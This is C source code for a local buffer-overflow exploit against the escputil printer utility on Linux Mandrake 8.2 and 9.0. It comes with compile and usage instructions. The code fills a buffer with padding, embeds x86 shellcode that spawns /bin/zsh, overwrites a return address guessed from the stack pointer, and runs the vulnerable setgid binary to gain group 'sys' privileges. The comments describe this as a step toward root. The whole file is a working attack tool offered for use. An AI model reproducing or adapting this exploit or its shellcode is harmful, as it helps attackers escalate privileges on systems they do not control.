/* Linux Mandrake 8.2, 9.0 / x86 local exploit for escputil Mandrake 8.2 provides escputil without sgid bit set, so exploiting doesn't change egid value, in Mandrake 9.0 escputil has sgid bit set and after successfully exploiting attacket gain egid=3(sys). It allows to gain root privileges through ml85p exploit. Exploit executes /bin/zsh, check if it exists before exploiting. Karol Wiêsek [appelast-at-bsquad.sm.pl] compile: gcc -o escputil escputil_ex.c usage: ./escputil [offset] */ #include #include #define VULN_PROG "/usr/bin/escputil" #define NOP 0x41 /* We don't have to setgid(3) when we don't execute bash and moreover we can't setgid(3) */ char shellcode[]= "\x31\xc0" /* xorl %eax,%eax */ "\x50" /* pushl %eax */ "\x68""/zsh" "\x68""/bin" "\x89\xe3" /* movl %esp,%ebx */ "\x50" /* pushl %eax */ "\x53" /* pushl %ebx */ "\x89\xe1" /* movl %esp,%ecx */ "\x99" /* cdql */ "\xb0\x0b" /* movb $0x0b,%al */ "\xcd\x80" /* int $0x80 */ ; long get_sp(void) { __asm("movl %esp, %eax"); } int main(int argc, char *argv[]) { char bufor[1051]; int addr,offset; fprintf(stderr,"\nLocal exploit for printer maintenance utility for EPSON Stylus printers\n"); fprintf(stderr,"Bug found and exploit writen by appelast [appelast-at-bsquad.sm.pl]\n"); fprintf(stderr,"\nUsage : %s [offset]\n", argv[0]); sleep(2); memset(bufor,NOP,sizeof(bufor)); if (argc>1) { offset=atoi(argv[1]); } else { offset = 500; } addr=get_sp() + offset; fprintf(stderr,"Address : 0x%08lx\n",addr); *(int *)(bufor+1046)=addr; memcpy(bufor+1050-4-strlen(shellcode)-1,shellcode,strlen(shellcode)); bufor[1050]=0; fprintf(stderr,"Exploiting...\n"); execl(VULN_PROG,VULN_PROG,"-P",bufor,"-c",NULL); return 0; }